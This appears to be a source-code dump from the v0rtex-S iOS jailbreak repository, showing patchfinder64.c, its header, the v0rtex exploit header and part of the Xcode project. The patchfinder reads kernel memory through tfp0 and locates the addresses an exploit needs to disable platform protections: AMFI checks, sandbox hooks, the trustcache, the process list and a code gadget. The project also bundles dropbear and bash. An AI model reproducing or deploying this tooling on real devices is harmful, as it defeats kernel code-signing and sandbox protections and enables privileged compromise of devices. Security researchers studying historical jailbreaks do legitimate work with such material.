value[reg] = newval; 387 | } 388 | } 389 | return value[which]; 390 | } 391 | 392 | static addr_t 393 | find_call64(const uint8_t *buf, addr_t start, size_t length) 394 | { 395 | return step64(buf, start, length, 0x94000000, 0xFC000000); 396 | } 397 | 398 | static addr_t 399 | follow_call64(const uint8_t *buf, addr_t call) 400 | { 401 | long long w; 402 | w = *(uint32_t *)(buf + call) & 0x3FFFFFF; 403 | w <<= 64 - 26; 404 | w >>= 64 - 26 - 2; 405 | return call + w; 406 | } 407 | 408 | static addr_t 409 | follow_cbz(const uint8_t *buf, addr_t cbz) 410 | { 411 | return cbz + ((*(int *)(buf + cbz) & 0x3FFFFE0) << 10 >> 13); 412 | } 413 | 414 | /* kernel iOS10 **************************************************************/ 415 | 416 | #include 417 | #include 418 | #include 419 | #include 420 | #include 421 | 422 | #ifdef __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ 423 | #include 424 | size_t kread(uint64_t where, void *p, size_t size); 425 | #endif 426 | 427 | static task_t tfp0; 428 | 429 | static uint8_t *kernel = NULL; 430 | static size_t kernel_size = 0; 431 | 432 | static addr_t xnucore_base = 0; 433 | static addr_t xnucore_size = 0; 434 | static addr_t prelink_base = 0; 435 | static addr_t prelink_size = 0; 436 | static addr_t cstring_base = 0; 437 | static addr_t cstring_size = 0; 438 | static addr_t pstring_base = 0; 439 | static addr_t pstring_size = 0; 440 | static addr_t kerndumpbase = -1; 441 | static addr_t kernel_entry = 0; 442 | static void *kernel_mh = 0; 443 | static addr_t kernel_delta = 0; 444 | 445 | int 446 | init_patchfinder(task_t taskfp0, addr_t base, const char *filename) 447 | { 448 | tfp0 = taskfp0; 449 | 450 | size_t rv; 451 | uint8_t buf[0x4000]; 452 | unsigned i, j; 453 | const struct mach_header *hdr = (struct mach_header *)buf; 454 | const uint8_t *q; 455 | addr_t min = -1; 456 | addr_t max = 0; 457 | int is64 = 0; 458 | 459 | init_kernel(taskfp0); 460 | 461 | #ifdef __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ 462 | #define close(f) 463 | rv = kread(base, buf, sizeof(buf)); 464 | if (rv != sizeof(buf)) { 465 | printf("failed kread, got size: %zu \n", rv); 466 | return -1; 467 | } 468 | #else /* __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ */ 469 | printf("this code right here has run ............. \n"); 470 | int fd = open(filename, O_RDONLY); 471 | if (fd < 0) { 472 | printf("failed at open, got fd: %s \n", fd); 473 | return -1; 474 | } 475 | 476 | rv = rk32_via_tfp0(tfp0, fd); 477 | //rv = read(fd, buf, sizeof(buf)); 478 | if (rv != sizeof(buf)) { 479 | close(fd); 480 | printf("failed at buf read, got rv: %d \n", rv); 481 | return -1; 482 | } 483 | #endif /* __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ */ 484 | 485 | if (!MACHO(buf)) { 486 | close(fd); 487 | printf("failed macho, buf: %s \n", buf); 488 | return -1; 489 | } 490 | 491 | if (IS64(buf)) { 492 | is64 = 4; 493 | } 494 | 495 | q = buf + sizeof(struct mach_header) + is64; 496 | for (i = 0; i < hdr->ncmds; i++) { 497 | const struct load_command *cmd = (struct load_command *)q; 498 | if (cmd->cmd == LC_SEGMENT_64) { 499 | const struct segment_command_64 *seg = (struct segment_command_64 *)q; 500 | if (min > seg->vmaddr) { 501 | min = seg->vmaddr; 502 | } 503 | if (max < seg->vmaddr + seg->vmsize) { 504 | max = seg->vmaddr + seg->vmsize; 505 | } 506 | if (!strcmp(seg->segname, "__TEXT_EXEC")) { 507 | xnucore_base = seg->vmaddr; 508 | xnucore_size = seg->filesize; 509 | } 510 | if (!strcmp(seg->segname, "__PLK_TEXT_EXEC")) { 511 | prelink_base = seg->vmaddr; 512 | prelink_size = seg->filesize; 513 | } 514 | if (!strcmp(seg->segname, "__TEXT")) { 515 | const struct section_64 *sec = (struct section_64 *)(seg + 1); 516 | for (j = 0; j < seg->nsects; j++) { 517 | if (!strcmp(sec[j].sectname, "__cstring")) { 518 | cstring_base = sec[j].addr; 519 | cstring_size = sec[j].size; 520 | } 521 | } 522 | } 523 | if (!strcmp(seg->segname, "__PRELINK_TEXT")) { 524 | const struct section_64 *sec = (struct section_64 *)(seg + 1); 525 | for (j = 0; j < seg->nsects; j++) { 526 | if (!strcmp(sec[j].sectname, "__text")) { 527 | pstring_base = sec[j].addr; 528 | pstring_size = sec[j].size; 529 | } 530 | } 531 | } 532 | } 533 | if (cmd->cmd == LC_UNIXTHREAD) { 534 | uint32_t *ptr = (uint32_t *)(cmd + 1); 535 | uint32_t flavor = ptr[0]; 536 | struct { 537 | uint64_t x[29]; /* General purpose registers x0-x28 */ 538 | uint64_t fp; /* Frame pointer x29 */ 539 | uint64_t lr; /* Link register x30 */ 540 | uint64_t sp; /* Stack pointer x31 */ 541 | uint64_t pc; /* Program counter */ 542 | uint32_t cpsr; /* Current program status register */ 543 | } *thread = (void *)(ptr + 2); 544 | if (flavor == 6) { 545 | kernel_entry = thread->pc; 546 | } 547 | } 548 | q = q + cmd->cmdsize; 549 | } 550 | 551 | kerndumpbase = min; 552 | xnucore_base -= kerndumpbase; 553 | prelink_base -= kerndumpbase; 554 | cstring_base -= kerndumpbase; 555 | pstring_base -= kerndumpbase; 556 | kernel_size = max - min; 557 | 558 | #ifdef __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ 559 | kernel = malloc(kernel_size); 560 | if (!kernel) { 561 | printf("failed to malloc kern \n"); 562 | return -1; 563 | } 564 | 565 | rv = kread(kerndumpbase, kernel, kernel_size); 566 | // rv = kread(kerndumpbase, kernel, kernel_size); 567 | if (rv != kernel_size) { 568 | free(kernel); 569 | printf("failed to kread kern, rv: %zu \n", rv); 570 | return -1; 571 | } 572 | 573 | kernel_mh = kernel + base - min; 574 | 575 | (void)filename; 576 | #undef close 577 | #else /* __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ */ 578 | kernel = calloc(1, kernel_size); 579 | if (!kernel) { 580 | close(fd); 581 | printf("failed to calloc kern, kernel: %d \n", kernel); 582 | return -1; 583 | } 584 | 585 | q = buf + sizeof(struct mach_header) + is64; 586 | for (i = 0; i < hdr->ncmds; i++) { 587 | const struct load_command *cmd = (struct load_command *)q; 588 | if (cmd->cmd == LC_SEGMENT_64) { 589 | const struct segment_command_64 *seg = (struct segment_command_64 *)q; 590 | size_t sz = pread(fd, kernel + seg->vmaddr - min, seg->filesize, seg->fileoff); 591 | if (sz != seg->filesize) { 592 | close(fd); 593 | free(kernel); 594 | printf("sz != seg->filesize, sz: %zu", sz); 595 | return -1; 596 | } 597 | if (!kernel_mh) { 598 | kernel_mh = kernel + seg->vmaddr - min; 599 | } 600 | if (!strcmp(seg->segname, "__LINKEDIT")) { 601 | kernel_delta = seg->vmaddr - min - seg->fileoff; 602 | } 603 | } 604 | q = q + cmd->cmdsize; 605 | } 606 | 607 | close(fd); 608 | 609 | (void)base; 610 | #endif /* __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ */ 611 | return 0; 612 | } 613 | 614 | void 615 | term_kernel(void) 616 | { 617 | free(kernel); 618 | } 619 | 620 | /* these operate on VA ******************************************************/ 621 | 622 | #define INSN_RET 0xD65F03C0, 0xFFFFFFFF 623 | #define INSN_CALL 0x94000000, 0xFC000000 624 | #define INSN_B 0x14000000, 0xFC000000 625 | #define INSN_CBZ 0x34000000, 0xFC000000 626 | 627 | addr_t 628 | find_register_value(addr_t where, int reg) 629 | { 630 | addr_t val; 631 | addr_t bof = 0; 632 | where -= kerndumpbase; 633 | if (where > xnucore_base) { 634 | bof = bof64(kernel, xnucore_base, where); 635 | if (!bof) { 636 | bof = xnucore_base; 637 | } 638 | } else if (where > prelink_base) { 639 | bof = bof64(kernel, prelink_base, where); 640 | if (!bof) { 641 | bof = prelink_base; 642 | } 643 | } 644 | val = calc64(kernel, bof, where, reg); 645 | if (!val) { 646 | return 0; 647 | } 648 | return val + kerndumpbase; 649 | } 650 | 651 | addr_t 652 | find_reference(addr_t to, int n, int prelink) 653 | { 654 | addr_t ref, end; 655 | addr_t base = xnucore_base; 656 | addr_t size = xnucore_size; 657 | if (prelink) { 658 | base = prelink_base; 659 | size = prelink_size; 660 | } 661 | if (n <= 0) { 662 | n = 1; 663 | } 664 | end = base + size; 665 | to -= kerndumpbase; 666 | do { 667 | ref = xref64(kernel, base, end, to); 668 | if (!ref) { 669 | return 0; 670 | } 671 | base = ref + 4; 672 | } while (--n > 0); 673 | return ref + kerndumpbase; 674 | } 675 | 676 | addr_t 677 | find_strref(const char *string, int n, int prelink) 678 | { 679 | uint8_t *str; 680 | addr_t base = cstring_base; 681 | addr_t size = cstring_size; 682 | if (prelink) { 683 | base = pstring_base; 684 | size = pstring_size; 685 | } 686 | str = boyermoore_horspool_memmem(kernel + base, size, (uint8_t *)string, strlen(string)); 687 | if (!str) { 688 | return 0; 689 | } 690 | return find_reference(str - kernel + kerndumpbase, n, prelink); 691 | } 692 | 693 | addr_t 694 | find_gPhysBase(void) 695 | { 696 | addr_t ret, val; 697 | addr_t ref = find_strref("\"pmap_map_high_window_bd: insufficient pages", 1, 0); 698 | if (!ref) { 699 | return 0; 700 | } 701 | ref -= kerndumpbase; 702 | ret = step64(kernel, ref, 64, INSN_RET); 703 | if (!ret) { 704 | return 0; 705 | } 706 | val = calc64(kernel, ref, ret, 8); 707 | if (!val) { 708 | return 0; 709 | } 710 | return val + kerndumpbase; 711 | } 712 | 713 | addr_t 714 | find_kernel_pmap(void) 715 | { 716 | addr_t call, bof, val; 717 | addr_t ref = find_strref("\"pmap_map_bd\"", 1, 0); 718 | if (!ref) { 719 | return 0; 720 | } 721 | ref -= kerndumpbase; 722 | call = step64_back(kernel, ref, 64, INSN_CALL); 723 | if (!call) { 724 | return 0; 725 | } 726 | bof = bof64(kernel, xnucore_base, call); 727 | if (!bof) { 728 | return 0; 729 | } 730 | val = calc64(kernel, bof, call, 2); 731 | if (!val) { 732 | return 0; 733 | } 734 | return val + kerndumpbase; 735 | } 736 | 737 | addr_t 738 | find_amfiret(void) 739 | { 740 | addr_t ret; 741 | addr_t ref = find_strref("AMFI: hook..execve() killing pid %u: %s\n", 1, 1); 742 | if (!ref) { 743 | return 0; 744 | } 745 | ref -= kerndumpbase; 746 | ret = step64(kernel, ref, 512, INSN_RET); 747 | if (!ret) { 748 | return 0; 749 | } 750 | return ret + kerndumpbase; 751 | } 752 | 753 | addr_t 754 | find_ret_0(void) 755 | { 756 | addr_t off; 757 | uint32_t *k; 758 | k = (uint32_t *)(kernel + xnucore_base); 759 | for (off = 0; off < xnucore_size - 4; off += 4, k++) { 760 | if (k[0] == 0xAA1F03E0 && k[1] == 0xD65F03C0) { 761 | return off + xnucore_base + kerndumpbase; 762 | } 763 | } 764 | k = (uint32_t *)(kernel + prelink_base); 765 | for (off = 0; off < prelink_size - 4; off += 4, k++) { 766 | if (k[0] == 0xAA1F03E0 && k[1] == 0xD65F03C0) { 767 | return off + prelink_base + kerndumpbase; 768 | } 769 | } 770 | return 0; 771 | } 772 | 773 | addr_t 774 | find_amfi_memcmpstub(void) 775 | { 776 | addr_t call, dest, reg; 777 | addr_t ref = find_strref("%s: Possible race detected. Rejecting.", 1, 1); 778 | if (!ref) { 779 | return 0; 780 | } 781 | ref -= kerndumpbase; 782 | call = step64_back(kernel, ref, 64, INSN_CALL); 783 | if (!call) { 784 | return 0; 785 | } 786 | dest = follow_call64(kernel, call); 787 | if (!dest) { 788 | return 0; 789 | } 790 | reg = calc64(kernel, dest, dest + 8, 16); 791 | if (!reg) { 792 | return 0; 793 | } 794 | return reg + kerndumpbase; 795 | } 796 | 797 | addr_t 798 | find_sbops(void) 799 | { 800 | addr_t off, what; 801 | uint8_t *str = boyermoore_horspool_memmem(kernel + pstring_base, pstring_size, (uint8_t *)"Seatbelt sandbox policy", sizeof("Seatbelt sandbox policy") - 1); 802 | if (!str) { 803 | return 0; 804 | } 805 | what = str - kernel + kerndumpbase; 806 | for (off = 0; off < kernel_size - prelink_base; off += 8) { 807 | if (*(uint64_t *)(kernel + prelink_base + off) == what) { 808 | return *(uint64_t *)(kernel + prelink_base + off + 24); 809 | } 810 | } 811 | return 0; 812 | } 813 | 814 | addr_t 815 | find_lwvm_mapio_patch(void) 816 | { 817 | addr_t call, dest, reg; 818 | addr_t ref = find_strref("_mapForIO", 1, 1); 819 | if (!ref) { 820 | return 0; 821 | } 822 | ref -= kerndumpbase; 823 | call = step64(kernel, ref, 64, INSN_CALL); 824 | if (!call) { 825 | return 0; 826 | } 827 | call = step64(kernel, call + 4, 64, INSN_CALL); 828 | if (!call) { 829 | return 0; 830 | } 831 | dest = follow_call64(kernel, call); 832 | if (!dest) { 833 | return 0; 834 | } 835 | reg = calc64(kernel, dest, dest + 8, 16); 836 | if (!reg) { 837 | return 0; 838 | } 839 | return reg + kerndumpbase; 840 | } 841 | 842 | addr_t 843 | find_lwvm_mapio_newj(void) 844 | { 845 | addr_t call; 846 | addr_t ref = find_strref("_mapForIO", 1, 1); 847 | if (!ref) { 848 | return 0; 849 | } 850 | ref -= kerndumpbase; 851 | call = step64(kernel, ref, 64, INSN_CALL); 852 | if (!call) { 853 | return 0; 854 | } 855 | call = step64(kernel, call + 4, 64, INSN_CALL); 856 | if (!call) { 857 | return 0; 858 | } 859 | call = step64(kernel, call + 4, 64, INSN_CALL); 860 | if (!call) { 861 | return 0; 862 | } 863 | call = step64_back(kernel, call, 64, INSN_B); 864 | if (!call) { 865 | return 0; 866 | } 867 | return call + 4 + kerndumpbase; 868 | } 869 | 870 | addr_t 871 | find_cpacr_write(void) 872 | { 873 | addr_t off; 874 | uint32_t *k; 875 | k = (uint32_t *)(kernel + xnucore_base); 876 | for (off = 0; off < xnucore_size - 4; off += 4, k++) { 877 | if (k[0] == 0xd5181040) { 878 | return off + xnucore_base + kerndumpbase; 879 | } 880 | } 881 | return 0; 882 | } 883 | 884 | addr_t 885 | find_str(const char *string) 886 | { 887 | uint8_t *str = boyermoore_horspool_memmem(kernel, kernel_size, (uint8_t *)string, strlen(string)); 888 | if (!str) { 889 | return 0; 890 | } 891 | return str - kernel + kerndumpbase; 892 | } 893 | 894 | addr_t 895 | find_entry(void) 896 | { 897 | /* XXX returns an unslid address */ 898 | return kernel_entry; 899 | } 900 | 901 | const unsigned char * 902 | find_mh(void) 903 | { 904 | return kernel_mh; 905 | } 906 | 907 | addr_t 908 | find_amfiops(void) 909 | { 910 | addr_t off, what; 911 | uint8_t *str = boyermoore_horspool_memmem(kernel + pstring_base, pstring_size, (uint8_t *)"Apple Mobile File Integrity", sizeof("Apple Mobile File Integrity") - 1); 912 | if (!str) { 913 | return 0; 914 | } 915 | what = str - kernel + kerndumpbase; 916 | /* XXX will only work on a dumped kernel */ 917 | for (off = 0; off < kernel_size - prelink_base; off += 8) { 918 | if (*(uint64_t *)(kernel + prelink_base + off) == what) { 919 | return *(uint64_t *)(kernel + prelink_base + off + 0x18); 920 | } 921 | } 922 | return 0; 923 | } 924 | 925 | addr_t 926 | find_sysbootnonce(void) 927 | { 928 | addr_t off, what; 929 | uint8_t *str = boyermoore_horspool_memmem(kernel + cstring_base, cstring_size, (uint8_t *)"com.apple.System.boot-nonce", sizeof("com.apple.System.boot-nonce") - 1); 930 | if (!str) { 931 | return 0; 932 | } 933 | what = str - kernel + kerndumpbase; 934 | for (off = 0; off < kernel_size - xnucore_base; off += 8) { 935 | if (*(uint64_t *)(kernel + xnucore_base + off) == what) { 936 | return xnucore_base + off + 8 + 4 + kerndumpbase; 937 | } 938 | } 939 | return 0; 940 | } 941 | 942 | uint64_t find_copyout(void) { 943 | // Find the first reference to the string 944 | addr_t ref = find_strref("\"%s(%p, %p, %lu) - transfer too large\"", 2, 0); 945 | if (!ref) { 946 | return 0; 947 | } 948 | ref -= kerndumpbase; 949 | 950 | uint64_t start = 0; 951 | for (int i = 4; i < 0x100*4; i+=4) { 952 | uint32_t op = *(uint32_t*)(kernel+ref-i); 953 | if (op == 0xd10143ff) { // SUB SP, SP, #0x50 954 | start = ref-i; 955 | break; 956 | } 957 | } 958 | if (!start) { 959 | return 0; 960 | } 961 | 962 | return start + kerndumpbase; 963 | } 964 | 965 | uint64_t find_bzero(void) { 966 | // Just find SYS #3, c7, c4, #1, X3, then get the start of that function 967 | addr_t off; 968 | uint32_t *k; 969 | k = (uint32_t *)(kernel + xnucore_base); 970 | for (off = 0; off < xnucore_size - 4; off += 4, k++) { 971 | if (k[0] == 0xd50b7423) { 972 | off += xnucore_base; 973 | break; 974 | } 975 | } 976 | 977 | uint64_t start = bof64(kernel, xnucore_base, off); 978 | if (!start) { 979 | return 0; 980 | } 981 | 982 | return start + kerndumpbase; 983 | } 984 | 985 | addr_t find_bcopy(void) { 986 | // Jumps straight into memmove after switching x0 and x1 around 987 | // Guess we just find the switch and that's it 988 | addr_t off; 989 | uint32_t *k; 990 | k = (uint32_t *)(kernel + xnucore_base); 991 | for (off = 0; off < xnucore_size - 4; off += 4, k++) { 992 | if (k[0] == 0xAA0003E3 && k[1] == 0xAA0103E0 && k[2] == 0xAA0303E1 && k[3] == 0xd503201F) { 993 | return off + xnucore_base + kerndumpbase; 994 | } 995 | } 996 | k = (uint32_t *)(kernel + prelink_base); 997 | for (off = 0; off < prelink_size - 4; off += 4, k++) { 998 | if (k[0] == 0xAA0003E3 && k[1] == 0xAA0103E0 && k[2] == 0xAA0303E1 && k[3] == 0xd503201F) { 999 | return off + prelink_base + kerndumpbase; 1000 | } 1001 | } 1002 | return 0; 1003 | } 1004 | 1005 | addr_t find_trustcache(void) { 1006 | addr_t call, func, val; 1007 | addr_t ref = find_strref("com.apple.MobileFileIntegrity", 1, 1); 1008 | if (!ref) { 1009 | printf("didnt find string ref\n"); 1010 | return 0; 1011 | } 1012 | ref -= kerndumpbase; 1013 | call = step64(kernel, ref, 32, INSN_CALL); 1014 | if (!call) { 1015 | printf("couldn't find the call\n"); 1016 | return 0; 1017 | } 1018 | call = step64(kernel, call+4, 32, INSN_CALL); 1019 | func = follow_call64(kernel, call); 1020 | if (!func) { 1021 | printf("couldn't follow the call\n"); 1022 | return 0; 1023 | } 1024 | val = calc64(kernel, func, func + 16, 8); 1025 | if (!val) { 1026 | return 0; 1027 | } 1028 | return val + kerndumpbase; 1029 | } 1030 | 1031 | addr_t find_amficache(void) { 1032 | addr_t call, func, bof, val; 1033 | addr_t ref = find_strref("com.apple.MobileFileIntegrity", 1, 1); 1034 | if (!ref) { 1035 | printf("didnt find string ref\n"); 1036 | return 0; 1037 | } 1038 | ref -= kerndumpbase; 1039 | call = step64(kernel, ref, 32, INSN_CALL); 1040 | if (!call) { 1041 | printf("couldn't find the call\n"); 1042 | return 0; 1043 | } 1044 | call = step64(kernel, call+4, 32, INSN_CALL); 1045 | func = follow_call64(kernel, call); 1046 | if (!func) { 1047 | printf("couldn't follow the call\n"); 1048 | return 0; 1049 | } 1050 | bof = bof64(kernel, func - 256, func); 1051 | if (!bof) { 1052 | printf("couldn't find the start of the function\n"); 1053 | return 0; 1054 | } 1055 | val = calc64(kernel, bof, func, 9); 1056 | if (!val) { 1057 | printf("couldn't find x9\n"); 1058 | return 0; 1059 | } 1060 | return val + kerndumpbase; 1061 | } 1062 | 1063 | // #ifdef HAVE_MAIN 1064 | 1065 | /* extra_recipe **************************************************************/ 1066 | 1067 | #define INSN_STR8 0xF9000000 | 8, 0xFFC00000 | 0x1F 1068 | 1069 | addr_t 1070 | find_AGXCommandQueue_vtable(void) 1071 | { 1072 | addr_t val, str8; 1073 | addr_t ref = find_strref("AGXCommandQueue", 1, 1); 1074 | if (!ref) { 1075 | return 0; 1076 | } 1077 | val = find_register_value(ref, 0); 1078 | if (!val) { 1079 | return 0; 1080 | } 1081 | ref = find_reference(val, 1, 1); 1082 | if (!ref) { 1083 | return 0; 1084 | } 1085 | ref -= kerndumpbase; 1086 | str8 = step64(kernel, ref, 32, INSN_STR8); 1087 | if (!str8) { 1088 | return 0; 1089 | } 1090 | val = calc64(kernel, ref, str8, 8); 1091 | if (!val) { 1092 | return 0; 1093 | } 1094 | return val + kerndumpbase; 1095 | } 1096 | 1097 | addr_t 1098 | find_allproc(void) 1099 | { 1100 | addr_t val, bof, str8; 1101 | addr_t ref = find_strref("\"pgrp_add : pgrp is dead adding process\"", 1, 0); 1102 | if (!ref) { 1103 | return 0; 1104 | } 1105 | ref -= kerndumpbase; 1106 | bof = bof64(kernel, xnucore_base, ref); 1107 | if (!bof) { 1108 | return 0; 1109 | } 1110 | str8 = step64_back(kernel, ref, ref - bof, INSN_STR8); 1111 | if (!str8) { 1112 | return 0; 1113 | } 1114 | val = calc64(kernel, bof, str8, 8); 1115 | if (!val) { 1116 | return 0; 1117 | } 1118 | return val + kerndumpbase; 1119 | } 1120 | 1121 | addr_t 1122 | find_call5(void) 1123 | { 1124 | addr_t bof; 1125 | uint8_t gadget[] = { 0x95, 0x5A, 0x40, 0xF9, 0x68, 0x02, 0x40, 0xF9, 0x88, 0x5A, 0x00, 0xF9, 0x60, 0xA2, 0x40, 0xA9 }; 1126 | uint8_t *str = boyermoore_horspool_memmem(kernel + prelink_base, prelink_size, gadget, sizeof(gadget)); 1127 | if (!str) { 1128 | return 0; 1129 | } 1130 | bof = bof64(kernel, prelink_base, str - kernel); 1131 | if (!bof) { 1132 | return 0; 1133 | } 1134 | return bof + kerndumpbase; 1135 | } 1136 | 1137 | addr_t 1138 | find_realhost(addr_t priv) 1139 | { 1140 | addr_t val; 1141 | if (!priv) { 1142 | return 0; 1143 | } 1144 | priv -= kerndumpbase; 1145 | val = calc64(kernel, priv, priv + 12, 0); 1146 | if (!val) { 1147 | return 0; 1148 | } 1149 | return val + kerndumpbase; 1150 | } 1151 | 1152 | #include 1153 | 1154 | addr_t 1155 | find_symbol(const char *symbol) 1156 | { 1157 | unsigned i; 1158 | const struct mach_header *hdr = kernel_mh; 1159 | const uint8_t *q; 1160 | int is64 = 0; 1161 | 1162 | if (IS64(hdr)) { 1163 | is64 = 4; 1164 | } 1165 | 1166 | /* XXX will only work on a decrypted kernel */ 1167 | if (!kernel_delta) { 1168 | return 0; 1169 | } 1170 | 1171 | /* XXX I should cache these. ohwell... */ 1172 | q = (uint8_t *)(hdr + 1) + is64; 1173 | for (i = 0; i < hdr->ncmds; i++) { 1174 | const struct load_command *cmd = (struct load_command *)q; 1175 | if (cmd->cmd == LC_SYMTAB) { 1176 | const struct symtab_command *sym = (struct symtab_command *)q; 1177 | const char *stroff = (const char *)kernel + sym->stroff + kernel_delta; 1178 | if (is64) { 1179 | uint32_t k; 1180 | const struct nlist_64 *s = (struct nlist_64 *)(kernel + sym->symoff + kernel_delta); 1181 | for (k = 0; k < sym->nsyms; k++) { 1182 | if (s[k].n_type & N_STAB) { 1183 | continue; 1184 | } 1185 | if (s[k].n_value && (s[k].n_type & N_TYPE) != N_INDR) { 1186 | if (!strcmp(symbol, stroff + s[k].n_un.n_strx)) { 1187 | /* XXX this is an unslid address */ 1188 | return s[k].n_value; 1189 | } 1190 | } 1191 | } 1192 | } 1193 | } 1194 | q = q + cmd->cmdsize; 1195 | } 1196 | return 0; 1197 | } 1198 | 1199 | /* test **********************************************************************/ 1200 | 1201 | /* 1202 | int 1203 | main(int argc, char **argv) 1204 | { 1205 | int rv; 1206 | addr_t base = 0; 1207 | const addr_t vm_kernel_slide = 0; 1208 | rv = init_kernel(base, (argc > 1) ? argv[1] : "krnl"); 1209 | assert(rv == 0); 1210 | 1211 | addr_t AGXCommandQueue_vtable = find_AGXCommandQueue_vtable(); 1212 | printf("\t\t\t0x%llx\n", AGXCommandQueue_vtable - vm_kernel_slide); 1213 | addr_t OSData_getMetaClass = find_symbol("__ZNK6OSData12getMetaClassEv"); 1214 | printf("\t\t\t0x%llx\n", OSData_getMetaClass); 1215 | addr_t OSSerializer_serialize = find_symbol("__ZNK12OSSerializer9serializeEP11OSSerialize"); 1216 | printf("\t\t\t0x%llx\n", OSSerializer_serialize); 1217 | addr_t k_uuid_copy = find_symbol("_uuid_copy"); 1218 | printf("\t\t\t0x%llx\n", k_uuid_copy); 1219 | addr_t allproc = find_allproc(); 1220 | printf("\t\t\t0x%llx\n", allproc); 1221 | addr_t realhost = find_realhost(find_symbol("_host_priv_self") + vm_kernel_slide); 1222 | printf("\t\t\t0x%llx\n", realhost - vm_kernel_slide); 1223 | addr_t call5 = find_call5(); 1224 | printf("\t\t\t0x%llx\n", call5 - vm_kernel_slide); 1225 | 1226 | assert(find_symbol("_rootvnode") == find_gPhysBase() + 0x38 - vm_kernel_slide); 1227 | 1228 | term_kernel(); 1229 | return 0; 1230 | }*/ 1231 | 1232 | // #endif /* HAVE_MAIN */ 1233 | -------------------------------------------------------------------------------- /v0rtex-S/the_super_fun_part/patchfinder64.h: -------------------------------------------------------------------------------- 1 | #ifndef PATCHFINDER64_H_ 2 | #define PATCHFINDER64_H_ 3 | 4 | #import "common.h" 5 | #import 6 | 7 | int init_patchfinder(task_t tfp0, uint64_t base, const char *filename); 8 | void term_kernel(void); 9 | 10 | enum { SearchInCore, SearchInPrelink }; 11 | 12 | uint64_t find_register_value(uint64_t where, int reg); 13 | uint64_t find_reference(uint64_t to, int n, int prelink); 14 | uint64_t find_strref(const char *string, int n, int prelink); 15 | uint64_t find_gPhysBase(void); 16 | uint64_t find_kernel_pmap(void); 17 | uint64_t find_amfiret(void); 18 | uint64_t find_ret_0(void); 19 | uint64_t find_amfi_memcmpstub(void); 20 | uint64_t find_sbops(void); 21 | uint64_t find_lwvm_mapio_patch(void); 22 | uint64_t find_lwvm_mapio_newj(void); 23 | 24 | uint64_t find_entry(void); 25 | const unsigned char *find_mh(void); 26 | 27 | uint64_t find_cpacr_write(void); 28 | uint64_t find_str(const char *string); 29 | uint64_t find_amfiops(void); 30 | uint64_t find_sysbootnonce(void); 31 | uint64_t find_trustcache(void); 32 | uint64_t find_amficache(void); 33 | 34 | uint64_t find_allproc(void); 35 | 36 | #endif 37 | -------------------------------------------------------------------------------- /v0rtex-S/v0rtex.h: -------------------------------------------------------------------------------- 1 | #ifndef V0RTEX_H 2 | #define V0RTEX_H 3 | 4 | #include 5 | 6 | #include "common.h" 7 | 8 | typedef kern_return_t (*v0rtex_cb_t)(task_t tfp0, kptr_t kbase, void *data); 9 | kern_return_t v0rtex(v0rtex_cb_t callback, void *cb_data, task_t *tfp0, kptr_t *kslide, kptr_t *kernucred, kptr_t *selfproc); 10 | 11 | #endif 12 | -------------------------------------------------------------------------------- /v0rtex-s.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 48; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | 820EF0671FEAB0B2006104ED /* libjb.a in Frameworks */ = {isa = PBXBuildFile; fileRef = 820EF0661FEAB0B2006104ED /* libjb.a */; }; 11 | 820EF06A1FEAB30D006104ED /* patchfinder64.c in Sources */ = {isa = PBXBuildFile; fileRef = 820EF0681FEAB30D006104ED /* patchfinder64.c */; }; 12 | 82178E0A1FEAFAF3002975CE /* amfi.m in Sources */ = {isa = PBXBuildFile; fileRef = 82178E091FEAFAF3002975CE /* amfi.m */; }; 13 | 828494641FEC371E00C59308 /* bootstrap.tar in Resources */ = {isa = PBXBuildFile; fileRef = 828494631FEC371E00C59308 /* bootstrap.tar */; }; 14 | 82AC281F1FF15709001E436A /* extrainst_ in Resources */ = {isa = PBXBuildFile; fileRef = 82AC281E1FF15709001E436A /* extrainst_ */; }; 15 | 82B603DC1FEC555800241A80 /* tar in Resources */ = {isa = PBXBuildFile; fileRef = 82B603D71FEC555700241A80 /* tar */; }; 16 | 82B603DD1FEC555800241A80 /* bash in Resources */ = {isa = PBXBuildFile; fileRef = 82B603D81FEC555700241A80 /* bash */; }; 17 | 82B603DE1FEC555800241A80 /* launchctl in Resources */ = {isa = PBXBuildFile; fileRef = 82B603DA1FEC555800241A80 /* launchctl */; }; 18 | 82B603DF1FEC555800241A80 /* dropbear in Resources */ = {isa = PBXBuildFile; fileRef = 82B603DB1FEC555800241A80 /* dropbear */; }; 19 | 82EDD2FE1FF670A5003D49F5 /* jailbreakd.m in Sources */ = {isa = PBXBuildFile; fileRef = 82EDD2FD1FF670A4003D49F5 /* jailbreakd.m */; }; 20 | 82EDD3001FF67BC6003D49F5 /* cydo in Resources */ = {isa = PBXBuildFile; fileRef = 82EDD2FF1FF67BC6003D49F5 /* cydo */; }; 21 | B58B32401FE4EBA300EB7B47 /* kernel.m in Sources */ = {isa = PBXBuildFile; fileRef = B58B323D1FE4EBA300EB7B47 /* kernel.m */; }; 22 | B58B32441FE4ED3B00EB7B47 /* ls in Resources */ = {isa = PBXBuildFile; fileRef = B58B32431FE4ED3B00EB7B47 /* ls */; }; 23 | B58B32461FE4ED6300EB7B47 /* symbols.m in Sources */ = {isa = PBXBuildFile; fileRef = B58B32451FE4ED6300EB7B47 /* symbols.m */; }; 24 | B58B32491FE4F3DF00EB7B47 /* root-rw.m in Sources */ = {isa = PBXBuildFile; fileRef = B58B32481FE4F3DF00EB7B47 /* root-rw.m */; }; 25 | B5BB8F791FE4D97800B60FDC /* README.md in Resources */ = {isa = PBXBuildFile; fileRef = B5BB8F781FE4D97800B60FDC /* README.md */; }; 26 | EE5169281FDC2A7000805460 /* v0rtex.m in Sources */ = {isa = PBXBuildFile; fileRef = EE5169271FDC2A7000805460 /* v0rtex.m */; }; 27 | EE5252AE1FDA4F2F00993801 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = EE5252AD1FDA4F2F00993801 /* AppDelegate.m */; }; 28 | 